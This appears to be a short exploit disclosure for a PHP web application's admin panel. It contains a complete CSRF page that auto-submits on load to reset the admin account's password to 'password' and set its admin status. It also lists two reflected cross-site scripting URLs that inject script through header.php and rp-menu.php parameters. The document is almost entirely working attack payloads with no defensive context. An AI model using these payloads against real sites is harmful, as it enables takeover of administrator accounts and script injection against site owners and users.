CSRF For Change Admin Password :
<html>
<head></head>
<body onLoad=javascript:document.form.submit()>
<form action="http://examplesite/admin/rp-settings-users-edit-db.php?id=1";
method="POST" name="form">
<input type="hidden" name="formusername" value="admin">
<input type="hidden" name="formname" value="admin">
<input type="hidden" name="formemail" value="[email protected]">
<input type="hidden" name="formpass" value="password">
<input type="hidden" name="formpass2" value="password">
<input type="hidden" name="formadminstatus" value="2">
<input type="hidden" name="rp-settings-users-edit-db" value="Confirm+%BB">
</form>
</body>
</html>
Cross Site Scripting Vulnerabilities :
http://examplesite/header.php?row[titledesc]=<script>alert(123)</script>
http://examplesite/admin/rp-menu.php?_SESSION[sess_user]=<script>alert(123)</script>